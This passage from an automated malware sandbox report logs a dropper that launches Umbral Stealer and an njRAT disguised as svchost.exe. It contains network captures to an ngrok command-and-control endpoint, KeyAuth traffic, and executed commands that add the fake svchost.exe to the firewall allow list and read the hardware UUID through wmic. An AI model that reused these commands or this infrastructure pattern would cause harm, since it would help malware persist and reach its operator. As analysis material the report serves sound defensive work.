                                                                      Apr 20, 2024 21:35:13.551850080 CEST19177497543.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:13.555141926 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:15.143261909 CEST19177497543.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:15.143349886 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:17.154467106 CEST4975419177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:17.161498070 CEST4975519177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:17.365092993 CEST19177497543.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:17.369352102 CEST19177497553.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:17.369426012 CEST4975519177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:17.370362997 CEST4975519177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:17.578255892 CEST19177497553.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:17.579185009 CEST4975519177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:17.787261009 CEST19177497553.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:18.563930035 CEST19177497553.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:18.564044952 CEST4975519177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:20.577477932 CEST4975519177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:20.578252077 CEST4975619177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:20.784600973 CEST19177497563.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:20.784679890 CEST4975619177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:20.785197020 CEST19177497553.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:20.785424948 CEST4975619177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:20.991660118 CEST19177497563.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:20.991739988 CEST4975619177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:21.198118925 CEST19177497563.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:23.589973927 CEST19177497563.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:23.794955969 CEST4975619177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:26.912571907 CEST4975619177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:26.913980961 CEST4975719177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:27.122458935 CEST19177497573.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:27.122610092 CEST4975719177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:27.123609066 CEST4975719177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:27.331931114 CEST19177497573.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:27.332079887 CEST4975719177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:27.541827917 CEST19177497573.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:32.786647081 CEST4975719177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:32.994806051 CEST19177497573.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:36.899019003 CEST19177497573.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:36.901648998 CEST4975719177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:38.904850960 CEST4975719177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:38.906203032 CEST4975819177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:39.112498045 CEST19177497583.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:39.112611055 CEST4975819177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:39.113114119 CEST19177497573.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:39.113590956 CEST4975819177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:39.319727898 CEST19177497583.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:39.323225021 CEST4975819177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:39.529649019 CEST19177497583.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:42.023350000 CEST4975819177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:42.229737997 CEST19177497583.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:53.014885902 CEST19177497583.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:53.014974117 CEST4975819177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:55.029465914 CEST4975819177192.168.2.43.125.223.134
                                                                      Apr 20, 2024 21:35:55.139180899 CEST4975919177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:35:55.236541986 CEST19177497583.125.223.134192.168.2.4
                                                                      Apr 20, 2024 21:35:55.346858025 CEST19177497593.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:35:55.346971035 CEST4975919177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:35:55.347737074 CEST4975919177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:35:55.555546999 CEST19177497593.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:35:55.555681944 CEST4975919177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:35:55.763550043 CEST19177497593.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:35:55.890075922 CEST4975919177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:35:56.097870111 CEST19177497593.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:35:59.356232882 CEST19177497593.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:35:59.356342077 CEST4975919177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:36:06.701337099 CEST4975919177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:36:06.702349901 CEST4976019177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:36:06.909024000 CEST19177497593.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:36:06.910784006 CEST19177497603.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:36:06.910867929 CEST4976019177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:36:06.911999941 CEST4976019177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:36:07.123210907 CEST19177497603.124.142.205192.168.2.4
                                                                      Apr 20, 2024 21:36:07.123313904 CEST4976019177192.168.2.43.124.142.205
                                                                      Apr 20, 2024 21:36:07.331947088 CEST19177497603.124.142.205192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 20, 2024 21:31:58.862685919 CEST5316353192.168.2.41.1.1.1
                                                                      Apr 20, 2024 21:31:58.969345093 CEST53531631.1.1.1192.168.2.4
                                                                      Apr 20, 2024 21:31:59.574022055 CEST5344653192.168.2.41.1.1.1
                                                                      Apr 20, 2024 21:31:59.678761959 CEST53534461.1.1.1192.168.2.4
                                                                      Apr 20, 2024 21:32:01.746205091 CEST5313253192.168.2.41.1.1.1
                                                                      Apr 20, 2024 21:32:01.853766918 CEST53531321.1.1.1192.168.2.4
                                                                      Apr 20, 2024 21:33:31.014870882 CEST5503053192.168.2.41.1.1.1
                                                                      Apr 20, 2024 21:33:31.136111021 CEST53550301.1.1.1192.168.2.4
                                                                      Apr 20, 2024 21:34:42.593089104 CEST6248453192.168.2.41.1.1.1
                                                                      Apr 20, 2024 21:34:42.701293945 CEST53624841.1.1.1192.168.2.4
                                                                      Apr 20, 2024 21:35:55.030271053 CEST6134753192.168.2.41.1.1.1
                                                                      Apr 20, 2024 21:35:55.138322115 CEST53613471.1.1.1192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Apr 20, 2024 21:31:58.862685919 CEST192.168.2.41.1.1.10xa909Standard query (0)keyauth.winA (IP address)IN (0x0001)false
                                                                      Apr 20, 2024 21:31:59.574022055 CEST192.168.2.41.1.1.10x4c8cStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                      Apr 20, 2024 21:32:01.746205091 CEST192.168.2.41.1.1.10x73e7Standard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                      Apr 20, 2024 21:33:31.014870882 CEST192.168.2.41.1.1.10x95b7Standard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                      Apr 20, 2024 21:34:42.593089104 CEST192.168.2.41.1.1.10x74ccStandard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                      Apr 20, 2024 21:35:55.030271053 CEST192.168.2.41.1.1.10xd0a2Standard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Apr 20, 2024 21:31:58.969345093 CEST1.1.1.1192.168.2.40xa909No error (0)keyauth.win104.26.0.5A (IP address)IN (0x0001)false
                                                                      Apr 20, 2024 21:31:58.969345093 CEST1.1.1.1192.168.2.40xa909No error (0)keyauth.win104.26.1.5A (IP address)IN (0x0001)false
                                                                      Apr 20, 2024 21:31:58.969345093 CEST1.1.1.1192.168.2.40xa909No error (0)keyauth.win172.67.72.57A (IP address)IN (0x0001)false
                                                                      Apr 20, 2024 21:31:59.678761959 CEST1.1.1.1192.168.2.40x4c8cNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                      Apr 20, 2024 21:32:01.853766918 CEST1.1.1.1192.168.2.40x73e7No error (0)0.tcp.eu.ngrok.io18.158.249.75A (IP address)IN (0x0001)false
                                                                      Apr 20, 2024 21:33:31.136111021 CEST1.1.1.1192.168.2.40x95b7No error (0)0.tcp.eu.ngrok.io3.125.209.94A (IP address)IN (0x0001)false
                                                                      Apr 20, 2024 21:34:42.701293945 CEST1.1.1.1192.168.2.40x74ccNo error (0)0.tcp.eu.ngrok.io3.125.223.134A (IP address)IN (0x0001)false
                                                                      Apr 20, 2024 21:35:55.138322115 CEST1.1.1.1192.168.2.40xd0a2No error (0)0.tcp.eu.ngrok.io3.124.142.205A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • keyauth.win
                                                                      • ip-api.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449734208.95.112.1802180C:\Users\user\AppData\Local\Temp\Umbral.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 20, 2024 21:31:59.810339928 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                      Host: ip-api.com
                                                                      Connection: Keep-Alive
                                                                      Apr 20, 2024 21:31:59.926877022 CEST174INHTTP/1.1 200 OK
                                                                      Date: Sat, 20 Apr 2024 19:31:59 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 5
                                                                      Access-Control-Allow-Origin: *
                                                                      X-Ttl: 60
                                                                      X-Rl: 44
                                                                      Data Raw: 74 72 75 65 0a
                                                                      Data Ascii: true


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449733104.26.0.54432736C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-20 19:31:59 UTC162OUTPOST /api/1.0/ HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: keyauth.win
                                                                      Content-Length: 376
                                                                      Expect: 100-continue
                                                                      Connection: Keep-Alive
                                                                      2024-04-20 19:31:59 UTC25INHTTP/1.1 100 Continue
                                                                      2024-04-20 19:31:59 UTC376OUTData Raw: 74 79 70 65 3d 36 39 36 65 36 39 37 34 26 76 65 72 3d 61 66 62 32 31 63 30 32 65 30 66 30 35 32 34 35 34 30 64 61 34 64 37 37 35 65 32 34 33 37 31 34 26 68 61 73 68 3d 33 33 65 62 36 38 63 38 63 34 66 63 35 32 31 64 36 34 65 64 38 32 32 31 39 63 64 62 31 39 66 32 26 65 6e 63 6b 65 79 3d 34 35 39 66 32 37 63 33 61 36 36 66 33 31 38 66 38 34 31 66 38 34 34 61 61 61 37 66 66 36 61 65 35 63 36 32 66 30 39 65 35 32 32 30 63 30 34 34 62 61 65 34 39 64 61 35 35 31 39 39 64 66 38 38 64 32 66 33 37 61 34 32 65 31 64 39 63 62 39 65 31 65 64 31 36 32 61 66 61 30 63 64 63 36 66 37 38 37 61 36 63 37 33 63 63 36 34 37 64 65 66 66 33 61 36 39 38 35 34 61 35 31 31 35 61 65 31 61 37 62 31 63 34 33 63 38 62 66 66 33 30 62 38 38 35 61 62 33 66 32 61 64 38 34 65 39 66 30 31
                                                                      Data Ascii: type=696e6974&ver=afb21c02e0f0524540da4d775e243714&hash=33eb68c8c4fc521d64ed82219cdb19f2&enckey=459f27c3a66f318f841f844aaa7ff6ae5c62f09e5220c044bae49da55199df88d2f37a42e1d9cb9e1ed162afa0cdc6f787a6c73cc647deff3a69854a5115ae1a7b1c43c8bff30b885ab3f2ad84e9f01
                                                                      2024-04-20 19:31:59 UTC1369INHTTP/1.1 200 OK
                                                                      Date: Sat, 20 Apr 2024 19:31:59 GMT
                                                                      Content-Type: text/plain; charset=UTF-8
                                                                      Content-Length: 832
                                                                      Connection: close
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Li6XG0ZqzFudsp0JmEgzEUJ3mp8ro3GKa%2BFSLWvEHBpX6xHIjac7n0%2BEtdA4UDgLRgZYVrrOf0Qt8bFPxc4ilnFJBCqAB4vpuKf%2FE9s3Lc2iNCp1vjQz%2FgwM6v1O"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Acknowledge: Credit to VaultCord.com
                                                                      X-Powered-By: VaultCord.com
                                                                      content-security-policy: upgrade-insecure-requests
                                                                      permissions-policy: accelerometer=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                      strict-transport-security: max-age=31536000; includeSubDomains
                                                                      x-content-security-policy: img-src *; media-src * data:;
                                                                      x-content-type-options: nosniff
                                                                      x-frame-options: DENY
                                                                      x-xss-protection: 1; mode=block
                                                                      Access-Control-Allow-Headers: *
                                                                      Access-Control-Allow-Methods: *
                                                                      Access-Control-Allow-Origin: *
                                                                      Server: cloudflare
                                                                      CF-RAY: 87778ec849b353f2-ATL
                                                                      88f38867822eb239acd7c51c55e26acf60cecaf5ad84e332ac486f25539a1319d9c15322c226170ddbf4cbac5ce65ab36ae98b40aa514f2115ebfe0e4762655abd9ea32f8a044a5c4ce032fce55683e2a73c09f85a004419febd8dcfdc7ba882b8cbb19985c6d71ae48c53db366b7f1db6310a57b2fa733821ef859439455643d63682cf
                                                                      2024-04-20 19:31:59 UTC568INData Raw: 66 63 31 30 33 30 34 66 31 30 33 35 30 33 61 31 38 61 38 38 63 62 62 66 37 32 64 66 63 31 65 62 38 34 35 65 66 30 34 38 39 66 31 30 64 61 31 38 37 64 64 65 33 62 61 64 39 35 33 30 36 38 65 31 64 31 62 38 32 31 30 35 64 62 39 35 35 38 64 32 36 34 64 61 66 34 64 32 33 64 63 63 36 35 38 36 34 37 36 65 64 65 61 62 31 34 63 63 34 37 33 34 33 63 64 63 38 62 34 39 64 38 64 63 37 61 61 30 38 31 63 64 64 34 62 36 32 65 34 35 64 38 38 34 65 63 38 39 64 32 37 62 34 35 65 30 62 35 31 66 37 34 63 65 37 31 64 30 63 31 33 62 34 36 36 34 31 32 39 62 38 37 33 34 62 38 34 66 65 34 32 33 34 64 33 65 62 30 36 61 62 39 31 66 34 39 37 38 61 63 66 61 39 62 37 62 64 64 63 36 30 64 61 66 31 37 64 62 30 61 32 66 38 30 39 34 61 62 39 30 36 37 66 35 63 32 61 62 34 38 32 61 63 33 36
                                                                      Data Ascii: fc10304f103503a18a88cbbf72dfc1eb845ef0489f10da187dde3bad953068e1d1b82105db9558d264daf4d23dcc6586476edeab14cc47343cdc8b49d8dc7aa081cdd4b62e45d884ec89d27b45e0b51f74ce71d0c13b4664129b8734b84fe4234d3eb06ab91f4978acfa9b7bddc60daf17db0a2f8094ab9067f5c2ab482ac36


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449735104.26.0.54432736C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-20 19:32:00 UTC138OUTPOST /api/1.0/ HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: keyauth.win
                                                                      Content-Length: 162
                                                                      Expect: 100-continue
                                                                      2024-04-20 19:32:00 UTC25INHTTP/1.1 100 Continue
                                                                      2024-04-20 19:32:00 UTC162OUTData Raw: 74 79 70 65 3d 36 33 36 38 36 35 36 33 36 62 26 73 65 73 73 69 6f 6e 69 64 3d 33 38 36 35 36 31 33 36 36 33 33 32 33 31 36 35 26 6e 61 6d 65 3d 34 31 34 65 34 34 35 39 37 38 37 38 26 6f 77 6e 65 72 69 64 3d 34 31 34 32 37 61 36 34 37 37 37 30 36 37 36 33 34 39 36 31 26 69 6e 69 74 5f 69 76 3d 62 64 35 63 35 34 37 35 64 38 62 31 37 64 61 39 64 38 30 35 37 31 63 37 66 64 30 66 36 32 35 37 34 36 61 33 34 65 39 35 64 62 62 66 32 39 63 35 33 30 64 32 34 30 30 34 34 62 65 32 30 35 66 66
                                                                      Data Ascii: type=636865636b&sessionid=3865613663323165&name=414e44597878&ownerid=41427a64777067634961&init_iv=bd5c5475d8b17da9d80571c7fd0f625746a34e95dbbf29c530d240044be205ff
                                                                      2024-04-20 19:32:00 UTC1328INHTTP/1.1 200 OK
                                                                      Date: Sat, 20 Apr 2024 19:32:00 GMT
                                                                      Content-Type: text/plain;charset=UTF-8
                                                                      Content-Length: 224
                                                                      Connection: close
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wpf9Ze0KvHCndMv3XunuQSe3LNRImvMUERBT82N5D1jYSZa0HGsOgmnyCcLK8yfHHVtF3VsZmeOvdSx54%2F7lRd0r0ULwsYbyx7%2Bz%2BYkeyuVVa5eM%2FnK0nvhxANzY"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Acknowledge: Credit to VaultCord.com
                                                                      X-Powered-By: VaultCord.com
                                                                      content-security-policy: upgrade-insecure-requests
                                                                      permissions-policy: accelerometer=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                      strict-transport-security: max-age=31536000; includeSubDomains
                                                                      x-content-security-policy: img-src *; media-src * data:;
                                                                      x-content-type-options: nosniff
                                                                      x-frame-options: DENY
                                                                      x-xss-protection: 1; mode=block
                                                                      Access-Control-Allow-Headers: *
                                                                      Access-Control-Allow-Methods: *
                                                                      Access-Control-Allow-Origin: *
                                                                      Server: cloudflare
                                                                      CF-RAY: 87778ecda8ebb056-ATL
                                                                      47d7c699d1e209ca269c8904b14cb1dfcaaebe989de10b3658d79d518e66d0068135fe863de4d340d1cd9b80420503eb54e7f50f676a155ed52f265f222b0bdc8bc377eb3ab08b86ffcfabe90e2c76a27b2fddad766bf2883a12b5425dcb93f80dd5d4c7d33dcb6c521a71a8f842b4de


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:21:31:52
                                                                      Start date:20/04/2024
                                                                      Path:C:\Users\user\Desktop\KvS2rT08PQ.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\Desktop\KvS2rT08PQ.exe"
                                                                      Imagebase:0x150000
                                                                      File size:2'447'360 bytes
                                                                      MD5 hash:2784277BD68152ABF75C6C6D59FAB7AF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1650214474.0000000002791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:1
                                                                      Start time:21:31:55
                                                                      Start date:20/04/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Umbral.exe"
                                                                      Imagebase:0x253f8f30000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:774FA31E76AF56BBAD395E1E3AC68721
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 88%, ReversingLabs
                                                                      • Detection: 70%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:21:31:55
                                                                      Start date:20/04/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\svchost.exe"
                                                                      Imagebase:0xe00000
                                                                      File size:95'232 bytes
                                                                      MD5 hash:3071F4F7B11A6BF6C623E83EED6D2418
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: 00000002.00000000.1643260716.0000000000E02000.00000002.00000001.01000000.00000007.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000002.00000002.4100093724.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: unknown
                                                                      • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Florian Roth
                                                                      • Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 100%, ReversingLabs
                                                                      • Detection: 77%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:3
                                                                      Start time:21:31:55
                                                                      Start date:20/04/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe"
                                                                      Imagebase:0x191c1be0000
                                                                      File size:2'581'504 bytes
                                                                      MD5 hash:33EB68C8C4FC521D64ED82219CDB19F2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.4100234414.00000191C3C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000000.1646530842.00000191C1C92000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000003.00000002.4123441835.00000191DC700000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 50%, ReversingLabs
                                                                      • Detection: 65%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:5
                                                                      Start time:21:31:56
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"wmic.exe" csproduct get uuid
                                                                      Imagebase:0x7ff73bdc0000
                                                                      File size:576'000 bytes
                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:6
                                                                      Start time:21:31:56
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:21:31:57
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE
                                                                      Imagebase:0x1560000
                                                                      File size:82'432 bytes
                                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:21:31:57
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:9
                                                                      Start time:21:31:58
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:netsh firewall delete allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe"
                                                                      Imagebase:0x1560000
                                                                      File size:82'432 bytes
                                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:21:31:58
                                                                      Start date:20/04/2024
                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE
                                                                      Imagebase:0x1560000
                                                                      File size:82'432 bytes
